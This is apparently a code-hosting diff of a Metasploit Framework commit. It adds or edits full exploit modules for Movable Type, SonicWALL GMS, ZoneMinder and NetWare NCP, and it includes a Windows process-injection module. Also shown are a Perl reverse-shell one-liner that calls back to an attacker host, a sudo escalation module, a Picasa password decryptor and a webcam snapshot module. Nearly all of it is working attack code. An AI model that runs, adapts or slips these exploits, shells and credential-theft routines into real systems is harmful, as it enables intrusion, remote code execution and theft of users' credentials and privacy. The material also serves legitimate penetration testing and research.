disconnect
if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0
# res[8,2] => Reply Type
# res[15,1] => Connection Status
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Detected
end
def connection_request
pkt = "\x44\x6d\x64\x54" # NCP TCP id
pkt << "\x00\x00\x00\x17" # request_size
pkt << "\x00\x00\x00\x01" # version
pkt << "\x00\x00\x00\x00" # reply buffer size
pkt << "\x11\x11" # cmd => create service connection
pkt << "\x00" # sequence number
pkt << "\x00" # connection number
pkt << "\x00" # task number
pkt << "\x00" # reserved
pkt << "\x00" # request code
return pkt
end
def exploit
connect
print_status("Sending Service Connection Request...")
sock.put(connection_request)
res = sock.get
if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0
# res[8,2] => Reply Type
# res[15,1] => Connection Status
fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed")
end
print_good("Service Connection successful")
pkt = "\x44\x6d\x64\x54" # NCP TCP id
pkt << "\x00\x00\x00\x00" # request_size (filled later)
pkt << "\x00\x00\x00\x01" # version (1)
pkt << "\x00\x00\x00\x05" # reply buffer size
pkt << "\x22\x22" # cmd
pkt << "\x01" # sequence number
pkt << res[11] # connection number
pkt << "\x00" # task number
pkt << "\x00" # reserved
pkt << "\x17" # Login Object FunctionCode (23)
pkt << "\x00\xa7" # SubFuncStrucLen
pkt << "\x18" # SubFunctionCode
pkt << "\x90\x90" # object type
pkt << "\x50" # ClientNameLen
pkt << rand_text(7)
jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string
pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to to overwrite EIP
pkt << rand_text(target['Offset'] - jmp_payload.length)
pkt << [target.ret].pack("V")
pkt << payload.encoded
pkt[4,4] = [pkt.length].pack("N")
print_status("Sending Overflow on Keyed Object Login...")
sock.put(pkt)
sock.get
disconnect
end
end

2
modules/exploits/multi/browser/java_jre17_method_handle.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2012-5088' ],
[ 'URL', '86352' ],
[ 'OSVDB', '86352' ],
[ 'BID', '56057' ],
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],
[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]

2
modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path)
uri << '/' if target_uri.path[-1,1] != '/'
uri << '/' if uri[-1,1] != '/'
# Trigger the command execution bug
res = send_request_cgi({

2
modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
View File

@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

2
modules/exploits/multi/http/jenkins_script_console.rb
View File

@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerVBS

122
modules/exploits/multi/http/movabletype_upgrade_exec.rb Normal file
View File

@ -0,0 +1,122 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution',
'Description' => %q{
This module can be used to execute a payload on MoveableType (MT) that
exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),
that is used during installation and updating of the platform.
The vulnerability arises due to the following properties:
1. This script may be invoked remotely without requiring authentication
to any MT instance.
2. Through a crafted POST request, it is possible to invoke particular
database migration functions (i.e functions that bring the existing
database up-to-date with an updated codebase) by name and with
particular parameters.
3. A particular migration function, core_drop_meta_for_table, allows
a class parameter to be set which is used directly in a perl eval
statement, allowing perl code injection.
},
'Author' =>
[
'Kacper Nowak',
'Nick Blundell',
'Gary O\'Leary-Steele'
],
'References' =>
[
['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
['CVE', '2013-0209'],
['URL', 'http://www.sec-1.com/blog/?p=402'],
['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Platform' =>
[
'win',
'unix'
],
'Targets' =>
[
['Movable Type 4.2x, 4.3x', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jan 07 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt'])
], self.class)
end
def check
@peer = "#{rhost}:#{rport}"
fingerprint = rand_text_alpha(5)
print_status("#{@peer} - Sending check...")
begin
res = http_send_raw(fingerprint)
rescue Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
if (res)
if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
return Exploit::CheckCode::Vulnerable
elsif (res.code != 200)
return Exploit::CheckCode::Unknown
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Unknown
end
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Sending payload...")
http_send_cmd(payload.encoded)
end
def http_send_raw(cmd)
path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
send_request_cgi(
{
'uri' => path,
'method' => 'POST',
'vars_post' =>
{
'__mode' => 'run_actions',
'installing' => '1',
'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]}
}
})
end
def http_send_cmd(cmd)
pay = 'v0;use MIME::Base64;system(decode_base64(q('
pay << Rex::Text.encode_base64(cmd)
pay << ')));return 0'
http_send_raw(pay)
end
end

279
modules/exploits/multi/http/sonicwall_gms_upload.rb Normal file
View File

@ -0,0 +1,279 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
'Description' => %q{
This module exploits a code execution flaw in SonicWALL GMS. It exploits two
vulnerabilities in order to get its objective. An authentication bypass in the
Web Administration interface allows to abuse the "appliance" application and upload
an arbitrary payload embedded in a JSP. The module has been tested successfully on
SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
successfully while testing, shell payload have been used.
},
'Author' =>
[
'Nikolas Sotiriu', # Vulnerability Discovery
'Julian Vilas <julian.vilas[at]gmail.com>', # Metasploit module
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1359'],
[ 'OSVDB', '89347' ],
[ 'BID', '57445' ],
[ 'EDB', '24204' ]
],
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Targets' =>
[
[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 17 2012'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
], self.class)
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end
def generate_jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
var_data = Rex::Text.rand_text_alpha(rand(8)+8)
var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)
jspraw = "<%@ page import=\"java.io.*\" %>\n"
jspraw << "<%\n"
jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
jspraw << "String #{var_data} = \"\";\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
jspraw << "}\n"
jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
jspraw << "#{var_inputstream}.close();\n"
jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
jspraw << "{\n"
jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
jspraw << "#{var_comb} <<= 4;\n"
jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
jspraw << "}\n"
jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
jspraw << "#{var_outputstream}.close();\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
jspraw << "String[] #{var_fperm} = new String[3];\n"
jspraw << "#{var_fperm}[0] = \"chmod\";\n"
jspraw << "#{var_fperm}[1] = \"+x\";\n"
jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
# Linux and other UNICES allow removing files while they are in use...
jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
jspraw << "} else {\n"
# Windows does not ..
jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
jspraw << "}\n"
jspraw << "%>\n"
return jspraw
end
def get_install_path
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'connection' => 'TE, close',
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'vars_post' => {
'num' => '123456',
'action' => 'show_diagnostics',
'task' => 'search',
'item' => 'application_log',
'criteria' => '*.*',
'width' => '500'
}
})
if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
return $1
end
return nil
end
def upload_file(location, filename, contents)
post_data = Rex::MIME::Message.new
post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")
data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' =>
{
'TE' => "deflate,gzip;q=0.3",
},
'connection' => 'TE, close'
})
if res and res.code == 200 and res.body.empty?
return true
else
return false
end
end
def check
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
if get_install_path.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Vulnerable
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/'
# Get Tomcat installation path
print_status("#{@peer} - Retrieving Tomcat installation path...")
install_path = get_install_path
if install_path.nil?
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
end
print_good("#{@peer} - Tomcat installed on #{install_path}")
if target['Platform'] == "linux"
@location = "#{install_path}webapps/appliance/"
elsif target['Platform'] == "win"
@location = "#{install_path}webapps\\appliance\\"
end
# Upload the JSP and the raw payload
@jsp_name = rand_text_alphanumeric(8+rand(8))
jspraw = generate_jsp
# Specify the payload in hex as an extra file..
payload_hex = payload.encoded_exe.unpack('H*')[0]
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
end
print_status("#{@peer} - Uploading the payload")
if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
else
fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
end
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
res = send_request_cgi(
{
'uri' => "#{@uri}appliance/#{@jsp_name}.jsp",
'method' => 'GET'
})
if res and res.code != 200
print_warning("#{@peer} - Error triggering the payload")
end
register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
end
end

2
modules/exploits/multi/http/splunk_upload_app_exec.rb
View File

@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient

2
modules/exploits/multi/http/struts_code_exec.rb
View File

@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GoodRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient

2
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
]
],
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 0))
'DefaultTarget' => 2))
register_options(
[

148
modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb Normal file
View File

@ -0,0 +1,148 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'ZoneMinder Video Server packageControl Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability in ZoneMinder Video
Server version 1.24.0 to 1.25.0 which could be abused to allow
authenticated users to execute arbitrary commands under the context of the
web server user. The 'packageControl' function in the
'includes/actions.php' file calls 'exec()' with user controlled data
from the 'runState' parameter.
},
'References' =>
[
['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'],
],
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'License' => MSF_LICENSE,
'Privileged' => true,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'BadChars' => "\x00",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
},
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Jan 22 2013",
))
register_options([
OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1, 1] != '/'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
data = "action=login&view=version&username=#{user}&password=#{pass}"
# login and retrieve software version
print_status("#{peer} - Authenticating as user '#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}index.php",
'cookie' => "#{cookie}",
'data' => "#{data}",
})
if res and res.code == 200
if res.body =~ /<title>ZM - Login<\/title>/
print_error("#{peer} - Authentication failed")
return Exploit::CheckCode::Unknown
elsif res.body =~ /v1.2(4\.\d+|5\.0)/
return Exploit::CheckCode::Appears
elsif res.body =~ /<title>ZM/
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
def exploit
@peer = "#{rhost}:#{rport}"
base = target_uri.path
base << '/' if base[-1, 1] != '/'
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
user = datastore['USERNAME']
pass = datastore['PASSWORD']
data = "action=login&view=postlogin&username=#{user}&password=#{pass}"
command = Rex::Text.uri_encode(payload.encoded)
# login
print_status("#{@peer} - Authenticating as user '#{user}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}index.php",
'cookie' => "#{cookie}",
'data' => "#{data}",
})
if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
end
print_good("#{@peer} - Authenticated successfully")
# send payload
print_status("#{@peer} - Sending payload (#{command.length} bytes)")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{base}index.php",
'data' => "view=none&action=state&runState=start;#{command}%26",
'cookie' => "#{cookie}"
})
if res and res.code == 200
print_good("#{@peer} - Payload sent successfully")
else
fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
end
end
end

176
modules/exploits/windows/local/payload_inject.rb Normal file
View File

@ -0,0 +1,176 @@
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Memory Payload Injection',
'Description' => %q{
This module will inject a payload into memory of a process. If a payload
isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID
datastore option isn't specified, then it'll inject into notepad.exe instead.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'sinn3r'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> "Oct 12 2011"
))
register_options(
[
OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
], self.class)
end
# Run Method for when run command is issued
def exploit
@payload_name = datastore['PAYLOAD']
@payload_arch = framework.payloads.create(@payload_name).arch
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
pid = get_pid
if not pid
print_error("Unable to get a proper PID")
return
end
if @payload_arch.first =~ /64/ and client.platform =~ /x86/
print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
print_error("Migrate to an x64 process and try again.")
return false
else
inject_into_pid(pid)
end
end
# Figures out which PID to inject to
def get_pid
pid = datastore['PID']
if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)
print_status("Launching notepad.exe...")
pid = create_temp_proc
end
return pid
end
# Determines if a PID actually exists
def has_pid?(pid)
procs = []
begin
procs = client.sys.process.processes
rescue Rex::Post::Meterpreter::RequestError
print_error("Unable to enumerate processes")
return false
end
pids = []
procs.each do |p|
found_pid = p['pid']
return true if found_pid == pid
end
print_error("PID #{pid.to_s} does not actually exist.")
return false
end
# Checks the Architeture of a Payload and PID are compatible
# Returns true if they are false if they are not
def arch_check(pid)
# get the pid arch
client.sys.process.processes.each do |p|
# Check Payload Arch
if pid == p["pid"]
vprint_status("Process found checking Architecture")
if @payload_arch.first == p['arch']
vprint_good("Process is the same architecture as the payload")
return true
else
print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.")
return false
end
end
end
end
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc()
windir = client.fs.file.expand_path("%windir%")
# Select path of executable to run depending the architecture
if @payload_arch.first== "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"
elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/
cmd = "#{windir}\\System32\\notepad.exe"
elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/
cmd = "#{windir}\\Sysnative\\notepad.exe"
elsif @payload_arch.first == "x86" and client.platform =~ /x64/
cmd = "#{windir}\\SysWOW64\\notepad.exe"
end
begin
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
rescue Rex::Post::Meterpreter::RequestError
return nil
end
return proc.pid
end
def inject_into_pid(pid)
vprint_status("Performing Architecture Check")
return if not arch_check(pid)
begin
print_status("Preparing '#{@payload_name}' for PID #{pid}")
raw = payload.generate
print_status("Opening process #{pid.to_s}")
host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
if not host_process
print_error("Unable to open #{pid.to_s}")
return
end
print_status("Allocating memory in procees #{pid}")
mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
# Ensure memory is set for execution
host_process.memory.protect(mem)
print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
print_status("Writing the stager into memory...")
host_process.memory.write(mem, raw)
host_process.thread.create(mem, 0)
print_good("Successfully injected payload in to process: #{pid}")
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Unable to inject payload:")
print_line(e.to_s)
end
end
end

2
modules/payloads/singles/cmd/windows/reverse_perl.rb
View File

@ -48,7 +48,7 @@ module Metasploit3
lhost = datastore['LHOST']
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
end
end

16
modules/post/multi/manage/sudo.rb
View File

@ -30,7 +30,11 @@ class Metasploit3 < Msf::Post
versions from 2008 and later which support -A.
},
'License' => MSF_LICENSE,
'Author' => [ 'todb <todb[at]metasploit.com>'],
'Author' =>
[
'todb <todb[at]metasploit.com>',
'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option
],
'Platform' => [ 'linux','unix','osx','solaris','aix' ],
'References' =>
[
@ -39,6 +43,11 @@ class Metasploit3 < Msf::Post
],
'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'
))
register_options(
[
OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])
], self.class)
end
# Run Method for when run command is issued
@ -57,7 +66,12 @@ class Metasploit3 < Msf::Post
end
def get_root
if datastore['PASSWORD']
password = datastore['PASSWORD']
else
password = session.exploit_datastore['PASSWORD']
end
if password.to_s.empty?
print_status "No password available, trying a passwordless sudo."
else

63
modules/post/windows/gather/credentials/enum_picasa_pwds.rb
View File

@ -70,33 +70,12 @@ class Metasploit3 < Msf::Post
end
def get_registry
psecrets = ""
begin
print_status("Looking in registry for stored login passwords by Picasa ...")
username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
'GaiaEmail')
password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
'GaiaPass')
if username != nil and password != nil
passbin = [password].pack("H*")
pass = decrypt_password(passbin)
if pass != nil
print_status("Username: #{username}")
print_status("Password: #{pass}")
secret = "#{username}:#{pass}"
psecrets << secret
end
end
#For early versions of Picasa3
username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
'GaiaEmail')
password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
'GaiaPass')
username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaEmail') || ''
password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') || ''
credentials = Rex::Ui::Text::Table.new(
'Header' => "Picasa Credentials",
@ -107,25 +86,51 @@ class Metasploit3 < Msf::Post
"Password"
])
if username != nil and password != nil
foundcreds = 0
if !username.empty? and !password.empty?
passbin = [password].pack("H*")
pass = decrypt_password(passbin)
if pass != nil
print_status("Username: #{username}")
print_status("Password: #{pass}")
if pass and !pass.empty?
print_status("Found Picasa 2 credentials.")
print_good("Username: #{username}\t Password: #{pass}")
foundcreds = 1
credentials << [username,pass]
end
end
#For early versions of Picasa3
username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaEmail') || ''
password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') || ''
if !username.empty? and !password.empty?
passbin = [password].pack("H*")
pass = decrypt_password(passbin)
if pass and !pass.empty?
print_status("Found Picasa 3 credentials.")
print_good("Username: #{username}\t Password: #{pass}")
foundcreds = 1
credentials << [username,pass]
end
end
if foundcreds == 1
path = store_loot(
"picasa.creds",
"text/csv",
session,
credentials.to_csv,
"decrypted_picasa_data.csv",
"Decrypted Picasa Passwords")
"Decrypted Picasa Passwords"
)
print_status("Decrypted passwords saved in: #{path}")
end
else
print_status("No Picasa credentials found.")
end
rescue ::Exception => e

5
modules/post/windows/manage/webcam.rb
View File

@ -16,8 +16,8 @@ class Metasploit3 < Msf::Post
super(update_info(info,
'Name' => 'Windows Manage Webcam',
'Description' => %q{
This module will allow you to these things with your target's webcam: detect,
take a snapshot.
This module will allow the user to detect installed webcams (with
the LIST action) or take a snapshot (with the SNAPSHOT) action.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
@ -133,3 +133,4 @@ class Metasploit3 < Msf::Post
end
end

2
plugins/openvas.rb
View File

@ -530,7 +530,7 @@ class Plugin::OpenVAS < Msf::Plugin
end
else
print_status("Usage: openvas_report_import <report_id> <format_id>")
print_status("Only the NBE format is supported for importing.")
print_status("Only the NBE and XML formats are supported for importing.")
end
end